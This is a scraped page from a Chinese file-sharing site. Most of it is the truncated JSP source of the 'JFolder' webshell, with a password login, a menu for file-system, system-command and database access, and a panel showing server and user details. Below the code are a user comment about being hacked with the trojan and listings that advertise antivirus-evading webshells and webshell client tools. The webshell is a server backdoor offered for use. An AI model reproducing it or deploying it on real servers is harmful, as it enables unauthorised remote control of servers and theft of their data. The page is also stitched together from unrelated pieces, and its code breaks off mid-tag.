}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript">
<!--
function ltrim(str) {
 while (str.indexOf(0) == " ")
  str = str.substring(1);
 
 return str;
}

function changeAction(obj) {
 obj.submit();
}
//-->
</script>
<body>
<%
session.setMaxInactiveInterval(_sessionOutTime * 60);

if (request.getParameter("password") == null && session.getAttribute("password") == null) {
// show the login form
//================================================================================================
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:14px;top:200px">
  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
    <tr>
      <td class="tr1">
        <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
          <tr>
            <TD align="left"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>管理登录 :::...</b></font></TD>
            <TD align="right"><FONT color="#d2d8ec"><b>JFolder</b>_By_<b>hack520</b></FONT></TD>
          </tr>
            <form name="f1" method="post">
            <input type="hidden" name="__EVENTTARGET" value="" />
            <input type="hidden" name="__EVENTARGUMENT" value="" />
            <input type="hidden" name="__VIEWSTATE" value="dDwtMTQyNDQzOTM1NDt0PDtsPGk8OT47PjtsPHQ8cDxsPGVuY3R5cGU7PjtsPG11bHRpcGFydC9mb3JtLWRhdGE7Pj47bDxpPDE5Pjs+O2w8dDxAMDw7Ozs7Ozs7Ozs7Pjs7Pjs+Pjs+PjtsPE5ld0ZpbGU7TmV3RmlsZTtOZXdEaXJlY3Rvcnk7TmV3RGlyZWN0b3J5O0RCX3JCX01TU1FMO0RCX3JCX01TU1FMO0RCX3JCX0FjY2VzcztEQl9yQl9BY2Nlc3M7Pj7Z5iNIVOaWZWuK0pv8lCMSbhytgQ==" />
            <script language="javascript" type="text/javascript">
<!--
 function __doPostBack(eventTarget, eventArgument) {
  var theform;
  if (window.navigator.appName.toLowerCase().indexOf("microsoft") > -1) {
   theform = document.Form1;
  }
  else {
   theform = document.forms["Form1"];
  }
  theform.__EVENTTARGET.value = eventTarget.split("$").join(":");
  theform.__EVENTARGUMENT.value = eventArgument;
  theform.submit();
 }
// -->
</script>
            <tr>
              <td height="30" align="center" class="td2" colspan="2">
                <input name="password" type="password" class="textbox" id="Textbox" />
                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
              </td>
            </tr>
          </form>
          <SCRIPT type='text/javascript' language='javascript' src='http://xslt.alexa.com/site_stats/js/t/c?url='></SCRIPT>
      </TABLE></td>
    </tr>
  </TABLE>
</div>
<%
//================================================================================================
// end of the login form
} else {
 String password = null;
 
 if (session.getAttribute("password") == null) {
  password = (String)request.getParameter("password");
 
  if (validate(password) == false) {
   out.println("<div align=\"center\"><font color=\"red\"><li>哎呀,倒霉死啦!</font></div>");
   out.close();
   return;
  }
 
  session.setAttribute("password", password);
 } else {
  password = (String)session.getAttribute("password");
 }
 
 String action = null;
 

 if (request.getParameter("action") == null)
  action = "main";
 else
  action = (String)request.getParameter("action");
 
 if (action.equals("exit")) {
  session.removeAttribute("password");
  response.sendRedirect(request.getRequestURI());
  out.close();
  return;
 }

// show the main menu
//====================================================================================
%>
<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
 <form name="form1" method="get">
 <tr bgcolor="#CCCCCC">
  <td id="title"><!--[程序首页]--></td>
  <td align="right">
   <select name="action" onChange="javascript:changeAction(document.form1)">
    <option value="main">程序首页</option>
    <option value="filesystem">文件系统</option>
    <option value="command">系统命令</option>
    <option value="database">数据库</option>
    <option value="config">程序配置</option>
    <option value="about">关于程序</option>
    <option value="exit">退出程序</option>
   </select>
<script language="JavaScript">
<%
 out.println("var action = \"" + action + "\"");
%>
var sAction = document.form1.action;
for (var i = 0; i < sAction.length; i ++) {
 if (sAction[i].value == action) {
  sAction[i].selected = true;
  //title.innerHTML = "[" + sAction[i].innerHTML + "]";
 }
}
</script>
  </td>
 </tr>
 </form>
</table>
<%
//=====================================================================================
// end of main menu

 if (action.equals("main")) {
// print the system info table
//=======================================================================================
%>
<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
 <tr bgcolor="#FFFFFF">
  <td colspan="2" align="center">服务器信息</td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">服务器名</td>
  <td align="center" class="datarows"><%=request.getServerName()%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">服务器端口</td>
  <td align="center" class="datarows"><%=request.getServerPort()%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">操作系统</td>
  <td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">当前用户名</td>
  <td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">当前用户目录</td>
  <td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">当前用户工作目录</td>
  <td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">程序相对路径</td>
  <td align="center" class="datarows"><%=request.getRequestURI()%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">程序绝对路径</td>
  <td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
 </tr>
 <tr bgcolor="#FFFFFF">
  <td width="300" align="center" class="datarows">网络协议</td>
  <td align="center" class="datarows"

分享到:
评论
1 楼 yunmoxue 2010-02-20  
太 恶心了  06年的木马 就黑我了...太阳!.

相关推荐

    最新免杀webshell

    webshell 过世界杀软。带防删功能。提权加强版。

    JSP大马文件

    jsp 木马, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途

    1、熟悉ASP、PHP、JSP网站的搭建。告诉你网站是如何被架构的,进而为后面分析脚本程序漏洞时,测试漏洞所用。

    之后,就介绍JSP程序中常见的漏洞,教大家如何分析JSP程序中的漏洞,如源代码泄露、注入等等,同时还介绍一些JSP木马编写技术。最后,还用两个分析完整程序漏洞的例子作为实践,增加一些实战经验。 8、Web 2.0下的...

    jop.war

    这个特定的文件名为 "jsp 小马",暗示它可能包含了一个恶意的JSP木马。 【描述】描述中提到的 "jsp 小马" 是一种网络攻击手段,攻击者利用了Tomcat服务器的漏洞,特别是针对未设置或存在默认空密码的情况。攻击者...

    冰蝎v2.0.1.zip

    冰蝎webshell连接工具,无毒无后门,可放心使用

    Cknife 一句话连接工具.7z

    【标签】"cknife 菜刀 jsp一句话"是关键词,"cknife"和"菜刀"都是对Cknife工具的别称,"jsp一句话"则特指上述的1.jsp木马,它是基于Java的Webshell,能够在被入侵的Web服务器上执行命令。 【压缩包子文件的文件名称...

    精通脚本黑客

    - **JSP木马编写技术**:提供编写JSP木马的基本技巧。 ##### 8. Web2.0下的黑客技术 - **XML和Ajax的安全问题**:探讨Web2.0时代的核心技术XML和Ajax所带来的安全挑战及其解决办法。 #### 三、总结 《精通脚本...

    tomcat教程

    我们将一个 jsp 格式的 webshell 用 WinRar 打包,然后将其后缀改名为 WAR,最后将其上传到服务器,可以看到在 Tomcat 的后台中多了一个名为/gslw 的目录,点击该目录打开该目录 jsp 木马就运行了,这样就获得了一个...

    应急响应-攻击入侵排查 教学PPT

    例如,JSP木马常利用`Runtime`、`JspSpy`或`getParameter`,ASP木马可能涉及`Execute`和`request`,PHP木马可能使用`Eval`、`shell_exec`等函数。为检测这些后门,有专门的Windows和Linux平台查杀工具,如Windows下...

    高级软件工程师简历表格Word模板.doc

    - **熟练使用工具进行攻击检测**:包括对 ASP/JSP 木马、SQL 注入等常见攻击类型的检测。 - **精通 WebShell 获取与权限提升**:能够快速获取 WebShell 并通过多种方式(如 ASP 提权木马、SU 溢出、SU 覆盖等)进行...

    第八课+如何查杀木马+.zip

    第八课+如何查杀木马+.zip

    Godzilla:哥斯拉

    jsp jspx JAVA_AES_RAW jsp jspx CShapDynamicPayload CSHAP_AES_BASE64 aspx asmx ashx JAVA_AES_RAW aspx asmx ashx PhpDynamicPayload PHP_XOR_BASE64 php PHP_XOR_RAW php Raw or Base64 加密器区别 Raw : Raw是...

    web木马终结者 v1.0.rar

    【标题】"Web木马终结者 v1.0.rar"是一个专门针对网站被挂马问题的解决方案,由开发者根据常见的杀毒软件理念设计并编写。它利用JavaScript编程语言,结合Ajax技术,为用户提供了一种高效且实时的在线扫描工具。 ...

    JSP同时选择多文件上传MultifileUploadDemo

    - **安全考虑**:确保文件上传过程的安全性,避免恶意文件如病毒、木马的上传。可以通过检查文件类型、大小以及执行权限等方式进行限制。 - **文件命名**:避免文件名冲突,可能需要对上传的文件进行重命名。 - **...

    jsp--jboss

    在学习和实践中,了解如何在Linux环境下配置JBOSS服务器,部署JSP应用,以及如何处理Web安全问题(如防止木马植入)是非常重要的。这涉及到理解JSP语法、Servlet生命周期、JBOSS服务器配置、Linux命令行操作,以及...

    jsp文件管理系统

    jsp文件管理系统实现了文件的增删改查,可以执行windows命令,也就是一个木马

    jsp中用于文件上传的组件

    防止恶意用户上传木马或病毒文件,可以通过以下方式: 1. **验证文件扩展名**:确保上传的文件扩展名符合预期。 2. **限制文件大小**:设置合理的文件大小限制,防止过大文件消耗服务器资源。 3. **文件重命名**...

    脚本管理工具 php和jsp页面 接收命令参数 在服务器端执行

    JSP(Java Server Pages)是Java平台上的一个标准,用于创建动态网页,它的特点是与Java代码紧密集成,提供了强大的服务器端功能。 【压缩包子文件的文件名称列表】:木-马,小工具 这两个文件名可能代表了该工具...

    网页木马扫描器

    web网页木马后门扫描器内置多种挂马特征库,能够轻松扫描出电脑中的web网页木马,如asp\php\jsp\pl\图片木马等等,保护网站安全。

Global site tag (gtag.js) - Google Analytics